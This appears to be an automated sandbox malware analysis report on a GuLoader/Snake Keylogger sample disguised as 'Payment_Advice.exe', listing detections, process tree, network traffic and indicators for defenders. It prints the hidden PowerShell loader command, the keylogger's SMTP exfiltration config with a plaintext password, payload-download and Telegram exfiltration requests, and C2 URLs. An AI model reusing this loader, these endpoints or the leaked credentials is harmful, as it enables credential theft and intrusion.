Edit tour

Windows Analysis Report
Payment_Advice.exe

Overview

General Information

Sample name:	Payment_Advice.exe
Analysis ID:	1481503
MD5:	0347f8c12b5bb537bdbeca759b4c67f4
SHA1:	db7617a367383cde0ae94564f5b2484692554a88
SHA256:	e67c6018e32d7e2f598cf535fb6977c012cfa4fba14a21b4884adf405d3faeb0
Tags:	exesigned
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Powershell creates an autostart link

Powershell drops PE file

Sample is not signed and drops a device driver

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Payment_Advice.exe (PID: 1680 cmdline: "C:\Users\user\Desktop\Payment_Advice.exe" MD5: 0347F8C12B5BB537BDBECA759B4C67F4)

powershell.exe (PID: 5884 cmdline: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wab.exe (PID: 6752 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2439089411.0000000009D91000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: wab.exe PID: 6752	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wab.exe PID: 6752	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", CommandLine: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 1680, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", ProcessId: 5884, ProcessName: powershell.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 192.185.142.133, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 6752, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49731

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", CommandLine: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 1680, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", ProcessId: 5884, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.5 - Destination IP: 108.167.181.251

Timestamp:	2024-07-25T10:19:19.577126+0200
SID:	2803270
Source Port:	49713
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T10:19:36.426172+0200
SID:	2022930
Source Port:	443
Destination Port:	49722
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 193.122.6.168

Timestamp:	2024-07-25T10:19:25.097389+0200
SID:	2803274
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-07-25T10:19:25.702498+0200
SID:	2803305
Source Port:	49716
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T10:18:58.312180+0200
SID:	2022930
Source Port:	443
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-07-25T10:19:36.216211+0200
SID:	2803305
Source Port:	49723
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 193.122.6.168

Timestamp:	2024-07-25T10:19:28.159918+0200
SID:	2803274
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 193.122.6.168

Timestamp:	2024-07-25T10:19:22.456763+0200
SID:	2803274
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: Payment_Advice.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Payment_Advice.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49730 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbu source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aqm.Core.pdbh source: powershell.exe, 00000002.00000002.2435366329.00000000076DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl] source: powershell.exe, 00000002.00000002.2435366329.0000000007645000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbB396-481F-9042-AD358843EC24c source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Payment_Advice.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Payment_Advice.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Payment_Advice.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 028BF2EDh	5_2_028BF12B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 028BFAA9h	5_2_028BF804
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 028BF2EDh	5_2_028BF33C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 24492C21h	5_2_24492970
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 244931E8h	5_2_24492DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_24490040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449E311h	5_2_2449E068
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449DEB9h	5_2_2449DC10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449E769h	5_2_2449E4C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449F019h	5_2_2449ED70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449EBC1h	5_2_2449E918
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 244931E8h	5_2_24493116
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449F471h	5_2_2449F1C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 244931E8h	5_2_24492DC7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449FD21h	5_2_2449FA78
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449F8C9h	5_2_2449F620
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449D609h	5_2_2449D360
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449D1B1h	5_2_2449CF08
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 24490D0Dh	5_2_24490B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 24491697h	5_2_24490B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4x nop then jmp 2449DA61h	5_2_2449D7B8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.electromac.com.bo

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 08:19:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://electromac.com.bo
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.electromac.com.bo
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/01
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
